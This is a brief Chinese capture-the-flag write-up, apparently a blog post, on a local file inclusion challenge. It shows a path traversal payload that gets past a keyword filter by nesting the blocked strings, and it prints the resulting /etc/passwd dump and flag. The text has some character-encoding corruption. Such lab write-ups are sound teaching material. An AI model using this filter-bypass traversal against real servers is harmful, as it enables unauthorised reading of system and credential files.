一道文件包含的題

題目叫讀取/etc/passwd

瀏覽器輸入http://183.213.11.*:4414/stage/11/getfilecontent.php?file=./index.txt

瀏覽器顯示/var/www/stage/11/index.txthalou

經(jīng)過(guò)測(cè)試,發(fā)現(xiàn)過(guò)濾的關(guān)鍵字有

./ ? ? etc passwd ?c/p

因此,根據(jù)敏敏感詞感詞的思想,構(gòu)造payload如下:

getfilecontent.php?file=...//...//...//...//etetcc/c/ppasspasswdwd

瀏覽器顯示,得到key

/var/www/stage/11/../../../../etc/passwdroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shmysql:x:101:103:MySQL Server,,,:/nonexistent:/bin/falsemessagebus:x:102:106::/var/run/dbus:/bin/falsecolord:x:103:107:colord colour management daemon,,,:/var/lib/colord:/bin/falseusbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/falsemiredo:x:105:65534::/var/run/miredo:/bin/falsentp:x:106:112::/home/ntp:/bin/falseDebian-exim:x:107:113::/var/spool/exim4:/bin/falseavahi:x:108:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/falsebeef-xss:x:109:117::/var/lib/beef-xss:/bin/falsedradis:x:110:119::/var/lib/dradis:/bin/falsepulse:x:111:120:PulseAudio daemon,,,:/var/run/pulse:/bin/falsespeech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/shhaldaemon:x:113:122:Hardware abstraction layer,,,:/var/run/hald:/bin/falseiodine:x:114:65534::/var/run/iodine:/bin/falsepostgres:x:115:125:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bashsshd:x:116:65534::/var/run/sshd:/usr/sbin/nologinstunnel4:x:117:126::/var/run/stunnel4:/bin/falsestatd:x:118:65534::/var/lib/nfs:/bin/falsesslh:x:119:128::/nonexistent:/bin/falseDebian-gdm:x:120:129:Gnome Display Manager:/var/lib/gdm3:/bin/falsertkit:x:121:130:RealtimeKit,,,:/proc:/bin/falsesaned:x:122:131::/home/saned:/bin/falsesnmp:x:123:132::/var/lib/snmp:/bin/falseKey:2986372947239ABC

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容